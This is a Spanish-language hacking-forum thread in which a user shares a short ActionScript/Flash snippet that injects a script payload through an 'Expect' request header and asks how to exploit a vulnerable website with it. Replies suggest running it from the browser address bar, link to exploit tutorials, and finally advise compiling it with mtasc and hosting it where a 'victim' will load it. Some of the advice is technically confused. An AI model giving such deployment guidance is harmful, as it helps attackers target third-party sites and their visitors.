Bueno tengo este exploit
var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");
y quiero explotarlo en una web vulnerable a el, pero no se como, si lo saben diganmelo. Gracias ;)
Pues que sistema es ese?
a simple vista es una web hecha en AJAX y ese es codigo javascript, pos la puees ejecutar desde la barra de direcciones
javascript:var req:LoadVars=new LoadVars();req.addRequestHeader("Expect","<script>alert('gotcha!')</script>");req.send("http://www.target.site/","_blank","GET");
pero debes encontrar esa web vulnerable, de donde sacaste ese codigo?
o sea, pasa la url para ver para que sistema es xD
x.es
¿Que pongo en la url
www.x.es/javascript:var req:LoadVars=new LoadVars();req.addRequestHeader("Expect","<script>alert('gotcha!')</script>");req.send("http://www.target.site/","_blank","GET")
?
mmmhhh.. no, vas a tener que cargar el JS dara error por el ":" del var req:LoadVars ¬¬
Mirate los post pegados para que entiendas mejor de que se trata...
no recuerdo si hay info sobre eso xDD mejor lee lo que tenemos por aca
http://www.elhacker.net/jasildbg/
Tantes que leas algo mejor lee esto que te servira bastante
http://foro.elhacker.net/bugs_y_exploits/taller_introduccion_a_los_bugs_a_nivel_web-t173509.0.html
Cuando termines de leer este entonces sigues con este
https://foro.elhacker.net/bugs_y_exploits/taller_de_introduccion_a_bugsexploits_1deg-t103198.0.html
y ya luego lees el de jasildbg
:D
eso es flash jaja
compila ese codigo con mtasc, y subelo a una web que vea tu victima y yap :P